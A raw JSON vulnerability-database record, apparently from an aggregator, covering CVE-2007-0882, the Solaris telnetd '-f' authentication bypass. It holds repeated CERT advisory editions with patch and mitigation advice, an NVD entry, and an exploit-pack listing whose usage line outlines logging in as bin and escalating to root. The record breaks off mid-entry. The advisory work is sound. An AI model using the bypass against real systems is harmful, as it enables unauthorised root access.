<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * <http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * <http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * <http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Credit\n\nThis vulnerability was reported by Kingcope. \n\nThis document was written by Art Manion and Chris Taschner. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>) \n---|--- \n**Severity Metric:****** | 67.50 \n**Date Public:** | 2007-02-10 \n**Date First Published:** | 2007-02-12 \n**Date Last Updated: ** | 2008-07-21 18:13 UTC \n**Document Revision: ** | 75 \n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T18:13:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.ietf.org/rfc/rfc1572.txt", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://secunia.com/advisories/24166/", "http://securitytracker.com/alerts/2007/Feb/1017625.html", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", "http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/"], "cvelist": ["CVE-2007-0882"], "lastseen": "2018-12-25T20:18:56", "history": [], "viewCount": 25, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0882"]}, {"type": "osvdb", "idList": ["OSVDB:31881"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16220", "SECURITYVULNS:VULN:7211", "SECURITYVULNS:DOC:16558"]}, {"type": "seebug", "idList": ["SSV:18010"]}, {"type": "exploitdb", "idList": ["EDB-ID:3293", "EDB-ID:16328", "EDB-ID:9918"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82328"]}, {"type": "saint", "idList": ["SAINT:D7A17E0FAF80C87E6BDBCA024D9A13C0", "SAINT:F83AF66562E2301032ED9A730B8E80E0", "SAINT:DA3D62A8F297274BAB795DE91F7D7F28"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/SOLARIS/TELNET/FUSER"]}, {"type": "nessus", "idList": ["SOLARIS10_X86_120069.NASL", "SOLARIS10_TELNET_ENV.NASL", "SOLARIS10_120068.NASL"]}, {"type": "canvas", "idList": ["SOLARIS_TELNET"]}], "modified": "2018-12-25T20:18:56"}}, "objectVersion": "1.4"}, "lastseen": "2018-12-25T20:18:56", "differentElements": ["description"], "edition": 4}, {"bulletin": {"id": "VU:881872", "hash": "7b83b6e2a16597ea432997044aa181ec", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview \n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description \n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`.\n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). \n \n--- \n \n### Impact \n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. \n \n--- \n \n### Solution \n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet`**Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. \n--- \n \n### Vendor Information\n\n881872\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Sun Microsystems, Inc.\n\nNotified: February 12, 2007 Updated: February 16, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23881872 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * <http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * <http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * <http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * <http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Credit\n\nThis vulnerability was reported by Kingcope. \n\nThis document was written by Art Manion and Chris Taschner. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>) \n---|--- \n**Severity Metric:****** | 67.50 \n**Date Public:** | 2007-02-10 \n**Date First Published:** | 2007-02-12 \n**Date Last Updated: ** | 2008-07-21 18:13 UTC \n**Document Revision: ** | 75 \n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T18:13:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.ietf.org/rfc/rfc1572.txt", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://secunia.com/advisories/24166/", "http://securitytracker.com/alerts/2007/Feb/1017625.html", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", "http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/"], "cvelist": ["CVE-2007-0882"], "lastseen": "2019-04-24T19:50:16", "history": [], "viewCount": 25, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0882"]}, {"type": "seebug", "idList": ["SSV:18010"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16220", "SECURITYVULNS:VULN:7211", "SECURITYVULNS:DOC:16558"]}, {"type": "osvdb", "idList": ["OSVDB:31881"]}, {"type": "nessus", "idList": ["SOLARIS10_TELNET_ENV.NASL", "SOLARIS10_120068.NASL", "SOLARIS10_X86_120069.NASL"]}, {"type": "canvas", "idList": ["SOLARIS_TELNET"]}, {"type": "saint", "idList": ["SAINT:F83AF66562E2301032ED9A730B8E80E0", "SAINT:DA3D62A8F297274BAB795DE91F7D7F28", "SAINT:D7A17E0FAF80C87E6BDBCA024D9A13C0"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/SOLARIS/TELNET/FUSER"]}, {"type": "exploitdb", "idList": ["EDB-ID:3293", "EDB-ID:16328", "EDB-ID:9918"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82328"]}], "modified": "2019-04-24T19:50:16"}}, "objectVersion": "1.4"}, "lastseen": "2019-04-24T19:50:16", "differentElements": ["description"], "edition": 5}, {"bulletin": {"id": "VU:881872", "hash": "14970795e711eced4ee488385b58f233", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview \n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description \n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`.\n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). \n \n--- \n \n### Impact \n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. \n \n--- \n \n### Solution \n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet`**Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. \n--- \n \n### Vendor Information\n\n881872\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Sun Microsystems, Inc.\n\nNotified: February 12, 2007 Updated: February 16, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23881872 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * <http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * <http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * <http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * <http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Acknowledgements\n\nThis vulnerability was reported by Kingcope. \n\nThis document was written by Art Manion and Chris Taschner. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>) \n---|--- \n**Severity Metric:****** | 67.50 \n**Date Public:** | 2007-02-10 \n**Date First Published:** | 2007-02-12 \n**Date Last Updated: ** | 2008-07-21 18:13 UTC \n**Document Revision: ** | 75 \n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T18:13:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.ietf.org/rfc/rfc1572.txt", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://secunia.com/advisories/24166/", "http://securitytracker.com/alerts/2007/Feb/1017625.html", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", "http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/"], "cvelist": ["CVE-2007-0882"], "lastseen": "2019-05-01T19:51:29", "history": [], "viewCount": 25, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0882"]}, {"type": "seebug", "idList": ["SSV:18010"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16220", "SECURITYVULNS:VULN:7211", "SECURITYVULNS:DOC:16558"]}, {"type": "osvdb", "idList": ["OSVDB:31881"]}, {"type": "canvas", "idList": ["SOLARIS_TELNET"]}, {"type": "nessus", "idList": ["SOLARIS10_TELNET_ENV.NASL", "SOLARIS10_X86_120069.NASL", "SOLARIS10_120068.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:16328", "EDB-ID:9918", "EDB-ID:3293"]}, {"type": "saint", "idList": ["SAINT:D7A17E0FAF80C87E6BDBCA024D9A13C0", "SAINT:F83AF66562E2301032ED9A730B8E80E0", "SAINT:DA3D62A8F297274BAB795DE91F7D7F28"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82328"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/SOLARIS/TELNET/FUSER"]}], "modified": "2019-05-01T19:51:29"}}, "objectVersion": "1.4"}, "lastseen": "2019-05-01T19:51:29", "differentElements": ["cvss"], "edition": 6}, {"bulletin": {"id": "VU:881872", "hash": "63cc6f64ebdf6246323adbc9e236ce10", "type": "cert", "bulletinFamily": "info", "title": "Sun Solaris telnet authentication bypass vulnerability", "description": "### Overview \n\nA vulnerability in the Sun Solaris telnet daemon (`in.telnetd`) could allow a remote attacker to log on to the system with elevated privileges.\n\n### Description \n\nThe Sun Solaris telnet daemon may accept authentication information via the `USER` environment variable. However, the daemon does not properly sanitize this information before passing it to the login program, and login makes unsafe assumptions about the information. This may allow a remote attacker to trivially bypass the telnet and login authentication mechanisms. In some default configurations of Solaris this vulnerability cannot be exploited to gain access to the `root` account, but it can be used to gain privileges of other accounts, such as `adm` and `lp`.\n\nAccording to Sun, Solaris 10 (SunOS 5.10) and Solaris \"Nevada\" (SunOS 5.11) are affected by this issue. More information is available in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>) and in Alan Hargreaves' blog, [here ](<http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>)and [here](<http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>). \n \nThis vulnerability is being exploited by a worm, for more information see the [Security Sun Alert Feed](<http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>) and Technical Alert [TA07-059A](<http://www.us-cert.gov/cas/techalerts/TA07-059A.html>). \n \n--- \n \n### Impact \n\nA remote attacker could log on to a vulnerable system via telnet and gain elevated privileges. \n \n--- \n \n### Solution \n\n**Apply a patch** \nApply the patches referenced in Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n \n--- \n \n \n**Disable telnet** \n \nDisable telnet if it's not needed. Telnet can be disabled by issuing the following command: \n\n\n`# svcadm disable telnet`**Restrict access** \n \nYou may wish to block access to the vulnerable software from outside your network perimeter, specifically by blocking access to the ports used by Sun Solaris telnet (typically 23/tcp). This will limit your exposure to attacks. \n \n**Prefer SSH over telnet** \n \nSSH provides a comparatively more secure method for remotely logging into a system than telnet. As general advice, we recommend using SSH rather than telnet. \n--- \n \n### Vendor Information\n\n881872\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Sun Microsystems, Inc.\n\nNotified: February 12, 2007 Updated: February 16, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see Sun Alert Notification [102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23881872 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://www.ietf.org/rfc/rfc1572.txt>\n * <http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit>\n * <http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd>\n * <http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>\n * <http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen>\n * <http://secunia.com/advisories/24166/>\n * <http://securitytracker.com/alerts/2007/Feb/1017625.html>\n * <http://www.ciac.org/ciac/bulletins/r-139.shtml>\n * <http://riosec.com/solaris-telnet-0-day>\n * <http://www.computerdefense.org/?p=258>\n * <http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html>\n * <http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html>\n * <http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf>\n * <http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/>\n\n### Acknowledgements\n\nThis vulnerability was reported by Kingcope. \n\nThis document was written by Art Manion and Chris Taschner. \n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-0882](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882>) \n---|--- \n**Severity Metric:****** | 67.50 \n**Date Public:** | 2007-02-10 \n**Date First Published:** | 2007-02-12 \n**Date Last Updated: ** | 2008-07-21 18:13 UTC \n**Document Revision: ** | 75 \n", "published": "2007-02-12T00:00:00", "modified": "2008-07-21T18:13:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.kb.cert.org/vuls/id/881872", "reporter": "CERT", "references": ["http://www.ietf.org/rfc/rfc1572.txt", "http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit", "http://blogs.sun.com/tpenta/entry/more_on_the_in_telnetd", "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1", "http://blogs.sun.com/security/entry/solaris_in_telnetd_worm_seen", "http://secunia.com/advisories/24166/", "http://securitytracker.com/alerts/2007/Feb/1017625.html", "http://www.ciac.org/ciac/bulletins/r-139.shtml", "http://riosec.com/solaris-telnet-0-day", "http://www.computerdefense.org/?p=258", "http://blog.ncircle.com/blogs/vert/archives/2007/02/whats_old_is_new_again.html", "http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day-disable.html", "http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf", "http://asert.arbornetworks.com/2007/02/solaris-telnet-scanning-possible-worm/"], "cvelist": ["CVE-2007-0882"], "lastseen": "2019-05-29T20:43:22", "history": [], "viewCount": 28, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2019-05-29T20:43:22"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0882"]}, {"type": "osvdb", "idList": ["OSVDB:31881"]}, {"type": "canvas", "idList": ["SOLARIS_TELNET"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16220", "SECURITYVULNS:VULN:7211", "SECURITYVULNS:DOC:16558"]}, {"type": "nessus", "idList": ["SOLARIS10_TELNET_ENV.NASL", "SOLARIS10_120068.NASL", "SOLARIS10_X86_120069.NASL"]}, {"type": "seebug", "idList": ["SSV:18010"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/SOLARIS/TELNET/FUSER"]}, {"type": "saint", "idList": ["SAINT:DA3D62A8F297274BAB795DE91F7D7F28", "SAINT:F83AF66562E2301032ED9A730B8E80E0", "SAINT:D7A17E0FAF80C87E6BDBCA024D9A13C0"]}, {"type": "exploitdb", "idList": ["EDB-ID:3293", "EDB-ID:9918", "EDB-ID:16328"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82328"]}], "modified": "2019-05-29T20:43:22"}}, "objectVersion": "1.4"}, "lastseen": "2019-05-29T20:43:22", "differentElements": ["description"], "edition": 7}], "viewCount": 29, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2019-10-09T19:50:57"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-0882"]}, {"type": "saint", "idList": ["SAINT:D7A17E0FAF80C87E6BDBCA024D9A13C0", "SAINT:DA3D62A8F297274BAB795DE91F7D7F28", "SAINT:F83AF66562E2301032ED9A730B8E80E0"]}, {"type": "exploitdb", "idList": ["EDB-ID:9918", "EDB-ID:16328", "EDB-ID:3293"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:82328"]}, {"type": "nessus", "idList": ["SOLARIS10_X86_120069.NASL", "SOLARIS10_TELNET_ENV.NASL", "SOLARIS10_120068.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:16220", "SECURITYVULNS:VULN:7211", "SECURITYVULNS:DOC:16558"]}, {"type": "seebug", "idList": ["SSV:18010"]}, {"type": "canvas", "idList": ["SOLARIS_TELNET"]}, {"type": "osvdb", "idList": ["OSVDB:31881"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/SOLARIS/TELNET/FUSER"]}], "modified": "2019-10-09T19:50:57"}, "vulnersScore": 8.4}, "objectVersion": "1.4", "_object_type": "robots.models.cert.CertBulletin", "_object_types": ["robots.models.cert.CertBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "Argument injection vulnerability in the telnet daemon (in.telnetd) in Solaris 10 and 11 (SunOS 5.10 and 5.11) misinterprets certain client \"-f\" sequences as valid requests for the login program to skip authentication, which allows remote attackers to log into certain accounts, as demonstrated by the bin account.", "modified": "2018-10-30T16:25:00", "id": "CVE-2007-0882", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-0882", "published": "2007-02-12T20:28:00", "title": "CVE-2007-0882", "type": "cve", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2019-05-29T17:19:22", "bulletinFamily": "exploit", "description": "**Name**| solaris_telnet \n---|--- \n**CVE**| CVE-2007-0882 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| solaris_telnet \n**Notes**| References: ['http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1', 'http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit', 'http://blogs.zdnet.com/security/?p=31', 'http://www.milw0rm.com/exploits/3293'] \nCVE Name: CVE-2007-0882 \nVENDOR: Sun \nDate public: 02/10/2007 \nCERT Advisory: http://www.kb.cert.org/vuls/id/881872 \nUsage: Set username bin, with no password. Then use bin2root.sh to get full root priviledges. \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882 \nCVSS: 10.0 \n\n", "modified": "2007-02-12T20:28:00", "published": "2007-02-12T20:28:00", "id": "SOLARIS_TELNET", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/solaris_telnet", "type": "canvas", "title": "Immunity Canvas: SOLARIS_TELNET", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T22:39:41", "bulletinFamily": "exploit", "description": "<p>\u6f0f\u6d1e\u63cf\u8ff0\uff1aSolaris\u662f\u4e00\u6b3e\u7531Sun\u5f00\u53d1\u548c\u7ef4\u62a4\u7684\u5546\u4e1a\u6027\u8d28UNIX\u64cd\u4f5c\u7cfb\u7edf\u3002 Solaris 10\u7684TELNET\u670d\u52a1\u5728\u5904\u7406\u7578\u5f62\u7684\u8ba4\u8bc1\u6570\u636e\u65f6\u5b58\u5728\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u7ed5\u8fc7\u8ba4\u8bc1\u83b7\u5f97\u8bbf\u95ee\u3002 Solaris 10\u7684Telnet\u5b88\u62a4\u8fdb\u7a0b\u672a\u7ecf\u68c0\u67e5\u5c06\u7528\u6237\u53ef\u80fd\u63d0\u4ea4\u7684\u7578\u5f62\u53c2\u6570\u76f4\u63a5\u4f20\u9012\u7ed9login\u8fdb\u7a0b\u5904\u7406\uff0clogin\u8fdb\u7a0b\u7531\u6b64\u6267\u884c\u975e\u9884\u671f\u7684\u7528\u6237\u8eab\u4efd\u5207\u6362\u64cd\u4f5c\u3002\u8fd9\u53ef\u80fd\u5141\u8bb8\u7528\u6237\u65e0\u9700\u53e3\u4ee4\u4fbf\u53ef\u4ee5\u67d0\u4e9b\u7279\u6743\u7528\u6237\u6743\u9650\u767b\u5f55\u5230\u7cfb\u7edf\uff0c\u83b7\u5f97\u5b8c\u5168\u7684\u7cfb\u7edf\u8bbf\u95ee\uff0c\u5982\u679c\u7cfb\u7edf\u672a\u80fd\u5bf9root\u7528\u6237\u767b\u5f55\u4f4d\u7f6e\u4f5c\u9650\u5236\uff0c\u83b7\u53d6root\u7528\u6237\u8bbf\u95ee\u4e5f\u662f\u53ef\u80fd\u7684\u3002</p><p>CVE-ID\uff1aCVE-2007-0882</p><p>CNNVD-ID\uff1aCNNVD-200702-224</p><p>CVE\u5b98\u65b9\u94fe\u63a5<a 